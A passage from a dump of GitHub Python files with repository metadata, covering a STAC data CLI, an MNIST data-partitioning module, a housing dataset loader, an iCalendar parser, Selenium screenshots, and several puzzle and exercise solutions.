short_help=(\"Commands for working with JRC-GSW data.\"),\n )\n def jrc_gsw():\n pass\n\n @jrc_gsw.command(\n \"create-collection\",\n short_help=\"Creates STAC collections for JRC-GSW data.\",\n )\n @click.option(\n \"-d\",\n \"--destination\",\n required=True,\n help=\"The output directory for the root STAC Collection json.\",\n )\n def create_collection_command(destination: str):\n \"\"\"Creates a STAC Collection for each mapped dataset from the European Commission\n Joint Research Centre - Global Surface Water program.\n\n Args:\n destination (str): Directory used to store the root STAC collection.\n Returns:\n Callable\n \"\"\"\n root_col = stac.create_collection(ROOT)\n\n for collection in [\n AGGREGATED,\n MONTHLY_HISTORY,\n MONTHLY_RECURRENCE,\n YEARLY_CLASSIFICATION,\n ]:\n col = stac.create_collection(collection)\n col.normalize_hrefs(destination)\n col.save()\n col.validate()\n root_col.add_child(col)\n\n root_col.normalize_hrefs(destination)\n root_col.save()\n root_col.validate()\n\n @jrc_gsw.command(\n \"create-item\",\n short_help=\"Create a STAC item from a given COG.\",\n )\n @click.option(\n \"-d\",\n \"--destination\",\n required=True,\n help=\"The output directory for the STAC json.\",\n )\n @click.option(\n \"-s\",\n \"--source\",\n required=True,\n help=\"The path to the COG.\",\n )\n def create_item_command(destination: str, source: str):\n \"\"\"Creates a STAC Item\n\n Args:\n destination (str): The output directory for the STAC json.\n source (str): The root data directory. Must follow the\n structure found in:\n http://jeodpp.jrc.ec.europa.eu/ftp/jrc-opendata/GSWE/\n \"\"\"\n item = stac.create_item(source, destination)\n item_path = os.path.join(destination, f\"{item.id}.json\")\n item.set_self_href(item_path)\n item.save_object()\n item.validate()\n\n return jrc_gsw\n","repo_name":"stactools-packages/jrc-gsw","sub_path":"src/stactools/jrc_gsw/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"31518613614","text":"from .dtos import OutputTemplate\nfrom ..domain.events.template import TemplateValueSet\nfrom .mappers import map_template_entity_to_output_dto\nfrom .template_message_bus import handle_event\nfrom ..domain import entities, value_objects\nfrom ..domain.ports.unit_of_work import UnitOfWork\nfrom ..domain.value_objects import INITIAL_TEMPLATE_VERSION\nfrom ...common.time import get_current_utc_timestamp\n\n\n# In this example app, there is no need to care much about history of changes,\n# and rather focus on separating business logic from infrastructure and data integrity.\n\n# In case there is a need to track history of changes,\n# adapts the following approach:\n# https://www.cosmicpython.com/book/part2.html.\n\n\ndef create_template(\n unit_of_work: UnitOfWork,\n) -> (\n OutputTemplate\n): # It's correct to return data from command when no data are queried.\n # This approach meets the CQS pattern rules.\n # More details can be found here:\n # https://martinfowler.com/bliki/CommandQuerySeparation.html.\n\n template = entities.Template(\n id=entities.Template.generate_id(),\n timestamp=get_current_utc_timestamp(),\n version=INITIAL_TEMPLATE_VERSION,\n )\n output = map_template_entity_to_output_dto(template)\n\n with unit_of_work:\n unit_of_work.templates.save(template)\n\n return output\n\n\ndef delete_template(\n unit_of_work: UnitOfWork,\n template_id: value_objects.TEMPLATE_ID_TYPE,\n):\n with unit_of_work:\n 
unit_of_work.templates.delete(template_id)\n\n\ndef set_template_value(\n unit_of_work: UnitOfWork,\n template_id: value_objects.TEMPLATE_ID_TYPE,\n value: value_objects.TemplateValue,\n):\n \"\"\"\n Allocate here invokes of business logic related to particular action,\n transaction management, and data transformations.\n\n In other words,\n allocate here bridge logic between the presentation and data access layers,\n or any other\n that doesn't belong neither to the domain layer nor to the infrastructure layer.\n \"\"\"\n\n with unit_of_work:\n template = unit_of_work.templates.get(template_id)\n entities.set_template_value(template=template, value=value)\n unit_of_work.templates.save(template)\n\n # In this approach, a service layer is responsible for generating events.\n # More details can be found here:\n # https://www.cosmicpython.com/book/chapter_08_events_and_message_bus.html.\n # Moreover, in this example we don't care much about\n handle_event(TemplateValueSet(template_id=template.id, value=value))\n","repo_name":"mglowinski93/LargeApplicationTemplate","sub_path":"backend/modules/template_module/services/template_services.py","file_name":"template_services.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"77"} +{"seq_id":"39899445912","text":"class Human:\r\n def __init__(self, name, occupation):\r\n self.name = name\r\n self.occupation = occupation\r\n\r\n def do_work(self):\r\n if self.occupation == 'Developer':\r\n print(self.name, 'does coding')\r\n elif self.occupation == 'CEO':\r\n print(self.name, \"leads Company\")\r\n else:\r\n print(self.name, 'is an employee')\r\n\r\n def speaks(self):\r\n print(self.name, \"says I can do it!!!\")\r\n\r\nname = input('Enter name: ')\r\nocc = input('Enter occupation: ')\r\nperson = Human(name, occ)\r\nperson.do_work()\r\nperson.speaks()","repo_name":"Dheeraj-02NK/Data-Structures","sub_path":"01. Basics/Classes.py","file_name":"Classes.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"37339066212","text":"def first_non_repeat(string):\n '''\n return the first character that is unique inside the passed string\n by checking the first letter with rest of string then moving it to the \n back of the string if it is non unique\n '''\n result = None\n if len(string) == 1:\n # if the string has only 1 character, that character is unique!\n return string[0]\n else:\n for n in range(len(string)):\n first_letter = string[0]\n rest_of_string = string[1:]\n if first_letter in rest_of_string:\n string = rest_of_string + first_letter\n else:\n result = first_letter\n break\n return result\n\n# OK, so the algorithm above works, but I've since realized that Python includes a count()\n# method on strings... 
duh\n\ndef first_non_repeat_using_count(string):\n '''\n return the first letter that occurs only once in the string, starting from the beginning\n '''\n result = None\n for letter in string:\n if string.count(letter) == 1:\n result = letter\n break\n return result\n\n\n\n","repo_name":"qdonnellan/random_questions","sub_path":"questions/arrays_and_strings/strings/first_non_repeat.py","file_name":"first_non_repeat.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1153788706","text":"import sys\nsys.stdin = open(\"input.txt\", 'r')\ninput = sys.stdin.readline\n\nimport collections\n\nN, M = map(int, input().rstrip().split())\nS = map(lambda x:x.rstrip(), sys.stdin)\nS = sorted(filter(lambda x:len(x)>=M, S))\n\nc = list(collections.Counter(S).items())\nc.sort(key=lambda x:(-x[1], -len(x[0]), x[0]))\nfor v in c:\n print(v[0])","repo_name":"hjyoon/baekjoon-answers","sub_path":"_20000/20920.py","file_name":"20920.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37849655157","text":"import numpy as np\nimport torch\nimport torchvision\nfrom matplotlib import pyplot\nfrom torch.utils.data import DataLoader, Dataset\n\n\nclass LoadData:\n def __init__(self,\n dataset: str,\n train: bool,\n subset: bool):\n \"\"\"\n Class handles loading data for many separate nodes.\n\n :param dataset: Which dataset to load\n :param train: boolean to load train or test dataset\n :param subset: Only load a fraction of data. Hardcoded to 30%.\n \"\"\"\n\n PERCENT = .3\n\n if dataset == 'MNIST':\n data = torchvision.datasets.MNIST('./data', train=train, download=True,\n transform=torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(\n (0.1307,), (0.3081,))\n ]))\n else:\n raise ValueError\n\n data_size = len(data)\n self.data = data\n\n if subset:\n indx = torch.randperm(data_size)[:int(data_size * PERCENT)]\n self.samples = self.data.data[indx, :, :]\n self.labels = self.data.targets[indx]\n else:\n self.samples = self.data.data\n self.labels = self.data.targets\n\n self.random_seed = 42\n\n def get_data(self):\n return self.samples, self.labels\n\n def partition(self, to_partition, indices, nr_agents):\n \"\"\"\n Separate data into number of agents\n\n :param to_partition: data to partition\n :param indices: indices by which to partition\n :param nr_agents: number of partitions to create\n :return: list of partitioned data\n \"\"\"\n return [to_partition[indices[i]:indices[i + 1]] for i in range(nr_agents)]\n\n def split(self, how, nr_agents, **kwargs):\n \"\"\"\n Different ways to split data between nodes.\n\n :param how: ['random', 'uniform', 'non_iid_uniform', 'non_iid_random']\n :param nr_agents: number of agents to split data between\n :param kwargs: additional class_per_node argument for non_iid case\n :return: data partitioned according to :param how.\n \"\"\"\n if how == 'random':\n self.random_split(nr_agents)\n elif how == 'uniform':\n self.uniform_split(nr_agents)\n elif how == 'non_iid_uniform':\n self.non_iid_split(nr_agents, kwargs['class_per_node'], random=False)\n elif how == 'non_iid_random':\n self.non_iid_split(nr_agents, kwargs['class_per_node'], random=True)\n\n return self.get_data()\n\n def random_split(self, nr_agents):\n \"\"\"\n Give each Node random splits of data. 
Nodes will have different amounts of data.\n\n :param nr_agents:\n \"\"\"\n np.random.seed(self.random_seed)\n # Get random indices\n indices = sorted(np.random.randint(0, high=self.samples.shape[0], size=nr_agents - 1).tolist())\n indices = [0] + indices\n indices += [self.samples.shape[0]]\n\n self.samples = self.partition(self.samples, indices, nr_agents)\n self.labels = self.partition(self.labels, indices, nr_agents)\n\n def uniform_split(self, nr_agents):\n \"\"\"\n Give each Node uniform splits of data. Nodes will have same amounts of data.\n\n :param nr_agents:\n \"\"\"\n indices = np.linspace(start=0, stop=self.samples.shape[0], num=nr_agents + 1, dtype=int).tolist()\n\n self.samples = self.partition(self.samples, indices, nr_agents)\n self.labels = self.partition(self.labels, indices, nr_agents)\n\n def non_iid_split(self, nr_agents, class_per_node, random):\n \"\"\"\n Give nodes only certain number of class labels as data.\n\n :param nr_agents:\n :param class_per_node: number of class labels per node\n :param random: boolean denoting random or uniform split of data\n \"\"\"\n unique = list(set(self.labels.tolist()))\n len_unique = len(unique)\n\n # Create array that assigns a class to specific nodes\n # Use 'np.arange' to ensure every class is represented before repeating\n # A row represents nr_agents, a column represents classes per node\n agent_class_master = np.arange(start=0, stop=nr_agents * class_per_node) % len_unique\n np.random.shuffle(agent_class_master)\n agent_class_master = agent_class_master.reshape(nr_agents, class_per_node)\n\n # Split data by labels\n sample_list = [[] for _ in range(len_unique)]\n for i in range(len(self.labels)):\n sample_list[self.labels[i]].append(self.samples[i])\n\n # By class creates uniform or random indices splits to partition data to agents evenly\n class_count = np.bincount(agent_class_master.ravel())\n class_indices = {}\n for i in range(len(class_count)):\n if random:\n indices = sorted(np.random.randint(0, high=len(sample_list[i]), size=class_count[i] - 1).tolist())\n indices = [0] + indices\n indices += [len(sample_list[i])]\n class_indices[i] = indices\n else:\n class_indices[i] = np.linspace(start=0, stop=len(sample_list[i]), num=class_count[i] + 1,\n dtype=int).tolist()\n\n # Main loop that partitions data by the assigned class and proper amount\n all_agents = []\n all_class = []\n for agent in agent_class_master:\n agent_data = []\n agent_class = []\n for cls in agent:\n # Proportioned indices for data and grab correctly indexed data\n temp_indices = class_indices[cls]\n data_for_agent = sample_list[cls][temp_indices[0]:temp_indices[1] - 1]\n\n # Add data and class to this agents list\n agent_data = agent_data + data_for_agent\n agent_class = agent_class + [cls for _ in range(len(data_for_agent))]\n\n # Drop first index since we used that data, forces next person to use next index\n class_indices[cls] = temp_indices[1:]\n\n # Append agents data and class labels in order\n all_agents.append(torch.stack(agent_data))\n all_class.append(torch.tensor(agent_class))\n\n self.samples = all_agents\n self.labels = all_class\n\n\nclass CustomDataset(Dataset):\n \"\"\"\n Creates dataset with both boolean and class labels.\n \"\"\"\n\n def __init__(self, inputs, targets):\n \"\"\"\n :param inputs: Images 2x14x14\n :param targets: Class Label\n \"\"\"\n super(Dataset, self).__init__()\n self.data = []\n for inp, tgt in zip(inputs, targets):\n self.data.append([inp, tgt])\n\n def __len__(self):\n return len(self.data)\n\n def 
__getitem__(self, idx):\n return self.data[idx][0], self.data[idx][1]\n\n\ndef load_mnist_data(nr_nodes, nr_classes, allocation, subset, batch_size):\n \"\"\"\n Uses LoadData class to partition prepare data. Puts data into dataloader objects to make use of batching and shuffling.\n\n :param nr_nodes:\n :param nr_classes: if non_iid data, number class labels per node\n :param allocation: ['random', 'uniform', 'non_iid_uniform', 'non_iid_random'] how to split data\n :param subset: subset of data\n :param batch_size:\n :return:\n \"\"\"\n train_loader_list = []\n test_loader_list = []\n\n train = LoadData('MNIST', True, subset)\n test = LoadData('MNIST', False, False)\n\n train_data, train_targets = train.split(allocation, nr_nodes, class_per_node=nr_classes)\n for data, targets in zip(train_data, train_targets):\n train_dataset = CustomDataset(data, targets)\n train_loader_list.append(DataLoader(train_dataset, batch_size=batch_size, shuffle=True))\n\n test_data, test_targets = test.split('uniform', nr_nodes)\n for data, targets in zip(test_data, test_targets):\n test_dataset = CustomDataset(data, targets)\n test_loader_list.append(DataLoader(test_dataset, batch_size=batch_size, shuffle=False))\n\n return train_loader_list, test_loader_list\n\n\ndef plot_mnist(data):\n for i in range(9):\n pyplot.subplot(330 + 1 + i)\n a = data[i]\n pyplot.imshow(data[i], cmap=pyplot.get_cmap('gray'))\n pyplot.show()\n","repo_name":"Devrim-Celik/OptimML","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":8730,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"69893447610","text":"import os\nimport sys\nimport tarfile\nimport urllib.request\n\n# import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import StratifiedShuffleSplit\n\nfrom common import PROJECT_ROOT_DIR\n\nDOWNLOAD_ROOT = \"https://raw.githubusercontent.com/ageron/handson-ml2/master/\"\nHOUSING_PATH = os.path.join(PROJECT_ROOT_DIR, \"datasets\", \"housing\")\nHOUSING_URL = DOWNLOAD_ROOT + \"datasets/housing/housing.tgz\"\n\n\ndef fetch_housing_data(housing_url=HOUSING_URL, housing_path=HOUSING_PATH):\n os.makedirs(housing_path, exist_ok=True)\n tgz_path = os.path.join(housing_path, \"housing.tgz\")\n urllib.request.urlretrieve(housing_url, tgz_path)\n housing_tgz = tarfile.open(tgz_path)\n housing_tgz.extractall(path=housing_path)\n housing_tgz.close()\n\n\ndef load_housing_data(housing_path=HOUSING_PATH):\n csv_path = os.path.join(housing_path, \"housing.csv\")\n return pd.read_csv(csv_path)\n\n\ndef split_train_test(data, test_ratio):\n shuffled_indices = np.random.permutation(len(data))\n test_set_size = int(len(data) * test_ratio)\n test_indices = shuffled_indices[:test_set_size]\n train_indices = shuffled_indices[test_set_size:]\n return data.iloc[train_indices], data.iloc[test_indices]\n\n\ndef strata(data):\n data[\"income_cat\"] = pd.cut(data[\"median_income\"],\n bins=[0., 1.5, 3.0, 4.5, 6., np.inf],\n labels=[1, 2, 3, 4, 5])\n return data\n\n\ndef split_data(data):\n split = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=42)\n strata_test_set = None\n strata_train_set = None\n for train_index, test_index in split.split(data, data[\"income_cat\"]):\n strata_train_set = data.loc[train_index]\n strata_test_set = data.loc[test_index]\n return [strata_train_set, strata_test_set]\n\n\ndef train_test_sets():\n fetch_housing_data()\n data = load_housing_data()\n # train_set, test_set = 
split_train_test(housing, 0.2)\n # housing_with_id = housing.reset_index()\n # train_set, test_set = train_test_split(housing, test_size=0.2, random_state=42)\n strata(data)\n # housing[\"income_cat\"].hist()\n # plt.show()\n train_test = split_data(data)\n for set_ in train_test:\n set_.drop(\"income_cat\", axis=1, inplace=True)\n return train_test\n\n\nif __name__ == '__main__':\n train_test_sets()\n sys.exit(0)\n","repo_name":"TomasBahnik/ml","sub_path":"handson-ml2/02_end_to_end_machine_learning_project/prepare_train_test_sets.py","file_name":"prepare_train_test_sets.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70207002169","text":"\r\n'''\r\nWebdriver offers API to take screenshot of a webpage\r\n1- save_screenshot('filename')\r\n2- get_screenshot_as_file('filename')\r\n'''\r\n\r\nfrom selenium import webdriver\r\n\r\n\r\ndriver = webdriver.Chrome(executable_path='chromedriver.exe')\r\ndriver.get('http://demo.guru99.com/test/newtours/index.php')\r\n\r\ndriver.save_screenshot('F:\\\\homepage.png')\r\n\r\n\r\ndriver.get_screenshot_as_file('F:\\\\homepage2.png')\r\n","repo_name":"faizan352/selenium_webdriver","sub_path":"take_screen_shots.py","file_name":"take_screen_shots.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"8086792955","text":"import os\nfrom math import floor, ceil\nfrom .classes import Event, Calendar, Property, Timezone\n\ndef foldtoICS(calendarList):\n \"\"\"foldtoICS takes a list of calendar objects and returns an ICalendar friendly string.\"\"\"\n ICSString = ''\n for cal in calendarList:\n ICSString += \"BEGIN:VCALENDAR\\n\"\n for prop in cal.properties:\n ICSString += foldedProperty(prop)\n for entry in cal.timezones:\n ICSString += \"BEGIN:VTIMEZONE\\n\"\n for prop in entry.properties:\n ICSString += foldedProperty(prop)\n if len(entry.standardProperties) > 0:\n ICSString += \"BEGIN:STANDARD\\n\"\n for prop in entry.standardProperties:\n ICSString += foldedProperty(prop)\n ICSString += \"END:STANDARD\\n\"\n if len(entry.daylightProperties) > 0:\n ICSString += \"BEGIN:DAYLIGHT\\n\"\n for prop in entry.daylightProperties:\n ICSString += foldedProperty(prop)\n ICSString += \"END:DAYLIGHT\\n\"\n ICSString += \"END:VTIMEZONE\\n\"\n for event in cal.events:\n ICSString += \"BEGIN:VEVENT\\n\"\n for prop in event.properties:\n ICSString += foldedProperty(prop)\n ICSString += \"END:VEVENT\\n\"\n ICSString += \"END:VCALENDAR\\n\"\n return ICSString\n\n\ndef foldedProperty(prop):\n \"\"\"\n foldedProperty takes a full property and returns an iCalendar compliant\n folded string. 
\n \"\"\"\n prop.value = prepICSText(prop.value)\n checkString = ''\n if len(prop.parameters) > 0:\n checkString += f\"{prop.name};\"\n for param, val in prop.parameters.items():\n checkString += f\"{param}={val};\"\n checkString += f\":{prop.value}\\n\"\n else:\n checkString += f\"{prop.name}:{prop.value}\\n\"\n length = len(checkString)\n ICSstring = ''\n if length > 73:\n x = ceil(length/73)\n for i in range(x):\n if i == x-1:\n ICSstring += checkString[(i*73):length]\n else:\n ICSstring += checkString[(i*73):((i+1)*73)] + \"\\n \"\n else: \n ICSstring += checkString\n return ICSstring\n\ndef unfoldToCalendarList(stream):\n \"\"\"\n unfoldToCalendarList takes an opened stream from an iCalendar file (See IETF REF 5545,7986)\n and returns a list of calendar objects, with all compatiable components returned as\n objects nested within said calendar objects.\n \"\"\" \n rawStringList = stream.read(-1).splitlines()\n rawLength = len(rawStringList)\n unfoldedStrings = []\n storageString = ''\n ## We're going to have to concanate several strings in a row at times, so need to keep\n ## track of string indexes already added to our new list of strings.\n indexToSkip = []\n ## so we'll go go from string to string, checking if the string ahead\n for i in range(rawLength):\n if i not in indexToSkip and rawStringList[i].startswith('X-') != True:\n storageString = rawStringList[i]\n checkFurther = checkNextString(rawStringList, i, storageString, rawLength)\n if checkFurther[0] == []:\n unfoldedStrings.append(storageString)\n else:\n unfoldedStrings.append(checkFurther[1])\n for item in checkFurther[0]:\n indexToSkip.append(item)\n ## Since .ics files are built to hold multiple calendars, I think we store any import\n ## as a list.\n if unfoldedStrings[0] != \"BEGIN:VCALENDAR\":\n return print(\"Error: Line 1 does not contain 'BEGIN:VCALENDAR\")\n calendarList = []\n ## need to keep track of our calendars\n calendarCount = 0\n ## and events per calendar\n eventCount = 0\n timezoneCount = 0\n PropOwnership = \"\"\n for phrase in unfoldedStrings:\n ## ignore empty lines\n if phrase == \"\":\n continue\n ## We send the most likely propVal split into checkEscapedColon,\n ## which will recursively check for dqoute escapes in parameter values.\n propVal = phrase.split(\":\", maxsplit=1)\n escapedPropParam = checkEscapedColon(phrase, propVal[0])\n escapedPropVal = phrase.replace(escapedPropParam + \":\", '')\n ## Switch-a-palooza\n if escapedPropParam == \"BEGIN\":\n if escapedPropVal == \"VCALENDAR\":\n calendarList.append(Calendar())\n PropOwnership = \"CALENDAR\"\n elif escapedPropVal == \"VEVENT\":\n calendarList[calendarCount].events.append(Event())\n PropOwnership = \"EVENT\"\n elif escapedPropVal == \"VTIMEZONE\":\n calendarList[calendarCount].timezones.append(Timezone())\n PropOwnership = \"TIMEZONE\"\n elif escapedPropVal == \"STANDARD\":\n PropOwnership += \":STANDARD\"\n elif escapedPropVal == \"DAYLIGHT\":\n PropOwnership += \":DAYLIGHT\"\n else:\n PropOwnership = ''\n elif escapedPropParam == \"END\":\n ## if we end a calendar, increment calendarCount by 1, reset eventCount\n if escapedPropVal == \"VCALENDAR\":\n calendarCount += 1\n eventCount = 0\n elif escapedPropVal == \"VEVENT\":\n eventCount += 1\n elif escapedPropVal == \"VTIMEZONE\":\n timezoneCount += 1\n elif escapedPropVal == \"STANDARD\":\n PropOwnership = \"TIMEZONE\"\n elif escapedPropVal == \"DAYLIGHT\":\n PropOwnership == \"TIMEZONE\"\n else:\n cleanValue = cleanICSText(escapedPropVal)\n ## What monster would use a semi-colon 
within a parameter?? Well, now if they do I \n # don't have to worry about it.\n propParams = checkEscapedSemiColon(escapedPropParam)\n propName = propParams[0]\n paramList = []\n if len(propParams) != 1:\n propParams.pop(0)\n ## Filter out X- params\n for param in propParams:\n ## While I think it is not exactly what was envisioned in spec,\n ## we get empty strings from our splits when we have a semicolon\n ## before a colon. While it's an error from decoding our own encoding,\n ## I don't see a downside in adding this extra precaution, to stop\n ## our decoder from grinding to a halt.\n if param.startswith(\"X-\") or len(param) < 1:\n pass\n else:\n paramList.append(param)\n if PropOwnership == \"CALENDAR\":\n calendarList[calendarCount].properties.append(\n Property(propName, cleanValue, paramList)\n )\n elif PropOwnership == \"EVENT\":\n calendarList[calendarCount].events[eventCount].properties.append(\n Property(propName, cleanValue, paramList)\n )\n elif PropOwnership.startswith(\"TIMEZONE\"):\n if PropOwnership.endswith(\"STANDARD\"):\n calendarList[calendarCount].timezones[timezoneCount].standardProperties.append(\n Property(propName, cleanValue, paramList)\n )\n elif PropOwnership.endswith(\"DAYLIGHT\"):\n calendarList[calendarCount].timezones[timezoneCount].daylightProperties.append(\n Property(propName, cleanValue, paramList)\n )\n else:\n calendarList[calendarCount].timezones[timezoneCount].properties.append(\n Property(propName, cleanValue, paramList)\n )\n return calendarList\n\n## A colon split is fine for 90% of of all properties, except for a small subset where a colon is escaped in a dqoute.\n## so how do we detect this? I think the best way is to do a count of dquotes we have in the property/param\n## area after the split. If we have an odd number of dqoutes, then we must be in the middle of an escaped \n## parameter, and we can instead split by colon and add the rightmost splits to each other until we have\n## an even number of DQoutes. \ndef checkEscapedColon(phrase, tentativeProperty, recursed=0):\n \"\"\"\n checkEscapedColon checks for colons escaped by doubles quotes in a value of a parameter \n when reading an ics phrase. This Function takes a complete PROP;PARAM=VALUE;...:VALUE \n 'phrase', along with the initial 'tentativeProperty' of how the phrase should be split. \n Recursed is to be left as default, is used as a counter to properly consider \n progressively longer strings. Returns the entire PROP;PARAM=VALUE;...: string.\n \"\"\"\n correctString = ''\n if tentativeProperty.find('\"') != -1:\n checkDQoutes = tentativeProperty.split('\"')\n ## if checkDQoutes is an even number of strings we have an unclosed dqoute \n if len(checkDQoutes) % 2 == 0:\n colonHunter = phrase.split(\":\")\n recursed += 1\n potentialPropVal = ''\n for i in range(recursed + 1):\n potentialPropVal += colonHunter[i] + \":\"\n escaped = checkEscapedColon(phrase, potentialPropVal, recursed=recursed)\n if len(escaped.split('\"')) % 2 == 1:\n correctString += escaped.rstrip(\":\")\n else:\n correctString += tentativeProperty\n else:\n correctString += tentativeProperty\n return correctString\n\n## We should check for semi-colons escaped in parameters.\ndef checkEscapedSemiColon(phrase):\n \"\"\"\n checkEscapedSemiColon is another parsing function, similar to checkEscapedColon, except\n that it only needs to take a PROP;PARAM=VALUE;...: portion of an ics phrase. 
Returns\n a list of of all items delimited by a semi colon that are not escaped.\n \"\"\"\n paramList = phrase.split(\";\")\n paramLen = len(paramList)\n popList = []\n for i in range(paramLen):\n if i in popList:\n continue\n if paramList[i].find('\"') != -1:\n ## much like before, we find a quotation mark, see if it is closed. \n if len(paramList[i].split('\"')) % 2 == 0:\n paramList[i] += \";\" + paramList[i+1]\n paramList.pop(i+1)\n ## Best Bug: Tried using len(popList) as I was appending, which \n ## (duh) gives you the length of the list pre-append. \"+ 1\" is truly\n ## the mvp of programming.\n popList.append(paramLen - (len(popList) + 1))\n else:\n ## cool, no quotes.\n pass\n return paramList\n\n## Note: There is no checkEscapedComma, in part because our model assumed Parameters only have one value,\n## and because of considerations for fields like alt-rep. \n\n## checks the next string for folding, otherwise returns a list of indexs already\n## associated with the new concanated string.\ndef checkNextString(StringList, index, storageString, rawlength):\n \"\"\"\n checkNextString takes a parsed ICS string list, along with the current index being read,\n the string the user is writing to along with the rawlength of the string list. returns\n a tuple containing the indexes we combined into the string, as well as an updated \n storage string.\n \"\"\"\n ## a list of indexs of strings concanated to make our storage string\n indexToSkip = []\n ## make sure the index we are checking isn't out of bounds, has a single whitespace\n ## to being\n if index + 1 < rawlength and StringList[index+1].startswith(\" \"):\n ## combine our strings, replace \" \" instead of lstrip to preserve spaces between\n ## words that coincide with folds.\n storageString += StringList[index+1].replace(\" \", \"\", 1)\n indexToSkip.append(index+1)\n checkFurther = checkNextString(StringList, index+1, storageString, rawlength)\n ## did we change the string?\n if checkFurther[1] != storageString:\n for i in checkFurther[0]:\n indexToSkip.append(i)\n ## get the full string\n storageString = checkFurther[1]\n return indexToSkip, storageString\n\ndef cleanICSText(string):\n \"\"\"\n cleanICSText takes a string with iCalendar TEXT escapes, and returns a python\n friendly string.\n \"\"\"\n newstring = string.replace('\\\\\\\\', \"\\\\\").replace('\\\\;', \";\").replace('\\\\,', \",\")\n return newstring\n\ndef prepICSText(string):\n \"\"\"prepICSText takes a python string and returns a properly escaped iCalendar TEXT\"\"\"\n newstring = string.replace('\\\\', \"\\\\\\\\\").replace('\\\\\\\\n','\\\\n').replace(';', '\\\\;').replace(',', \"\\\\,\")\n return newstring\n\ndef main():\n testfile = open('example.ics', 'r', encoding='UTF-8')\n calList = unfoldToCalendarList(testfile) \n print(calList[0])\n print(\"<-------------------->\")\n backtoICS = foldtoICS(calList)\n print(backtoICS)\n with open(\"new.ics\", \"w\", encoding='UTF-8') as newfile:\n print(backtoICS, file=newfile)\n\nif __name__ == \"__main__\":\n main()","repo_name":"PhiloTFarnsworth/MarketMePostMortem","sub_path":"MMcalendar/MMiCAL/MMiCal.py","file_name":"MMiCal.py","file_ext":"py","file_size_in_byte":13199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72297241849","text":"# uncompyle6 version 3.6.5\n# Python bytecode 3.3 (3230)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: 
C:\\Users\\Steve\\workspace\\DnD_Add_Detail\\src\\sare\\DnD_Main\\Power.py\n# Compiled at: 2013-12-21 06:38:22\n__doc__ = '\\nCreated on Dec 17, 2013\\n\\n@author: Steve Sare\\n'\n\nclass Power(object):\n \"\"\"Power\"\"\"\n\n def __init__(self):\n \"\"\"\n Constructor\n \"\"\"\n pass\n\n def writePowers(self, output, ref, newChar):\n output.emit('Processing Powers...')\n root = newChar.getroot()\n for power in root.iter('Power'):\n self.writePower(ref, power)\n\n output.emit('Powers written')\n\n def writePower(self, ref, power):\n from sare.DnD_Main.CharacterFile import CharacterFile\n charFile = CharacterFile()\n refroot = ref.getroot()\n for rule in refroot.iter('RulesElement'):\n if rule.get('name') == power.get('name') and rule.get('type') == 'Power':\n for specific in power.findall('specific'):\n power.remove(specific)\n\n for flavor in rule.findall('Flavor'):\n charFile.writeFlavor(flavor, power)\n\n index = 1\n for specificref in rule.findall('specific'):\n power.insert(index, specificref)\n index = index + 1\n\n continue","repo_name":"CBLoader/DetailAdder","sub_path":"sare/DnD_Main/Power.py","file_name":"Power.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23610266472","text":"import numpy as np\nimport sys\n\nnp.set_printoptions(threshold=sys.maxsize)\n\nfrom tool.runners.python import SubmissionPy\n\nBASE_PATTERN = np.array([0, 1, 0, -1])\nN_PHASES = 100\n\n\nclass ThoreSubmission(SubmissionPy):\n def run(self, s):\n # :param s: input in string format\n # :return: solution flag\n x = np.array([int(d) for d in s], dtype=np.int)\n n = len(x)\n\n F = BASE_PATTERN[\n np.mod(\n np.arange(1, n + 1, dtype=np.int)[:, np.newaxis]\n // np.arange(1, n + 1, dtype=np.int),\n len(BASE_PATTERN),\n ).T\n ]\n\n for _ in range(N_PHASES):\n x = np.mod(np.abs(F @ x), 10)\n\n return \"\".join([str(d) for d in x[:8]])\n","repo_name":"lypnol/adventofcode-2019","sub_path":"day-16/part-1/thore.py","file_name":"thore.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"77"} +{"seq_id":"70087544569","text":"from computer import Computer\n\n\ndef part1(grid):\n result = sum(\n r * c\n for r in range(1, len(grid) - 1)\n for c in range(1, len(grid[r]) - 1)\n if all(\n x == \"#\"\n for x in (\n grid[r][c],\n grid[r - 1][c],\n grid[r][c - 1],\n grid[r + 1][c],\n grid[r][c + 1],\n )\n )\n )\n print(result)\n\n\ndef rotated(orientation):\n return {\"^\": \"<\", \"<\": \"v\", \"v\": \">\", \">\": \"^\"}[orientation]\n\n\ndef find_instructions(grid):\n orientations = {\n \"^\": (-1, 0),\n \"<\": (0, -1),\n \"v\": (1, 0),\n \">\": (0, 1),\n }\n\n # Find the initial orientation and position.\n state = next(\n (grid[r][c], r, c)\n for r in range(len(grid))\n for c in range(len(grid[r]))\n if grid[r][c] in orientations\n )\n prev_state = None\n\n rotations = 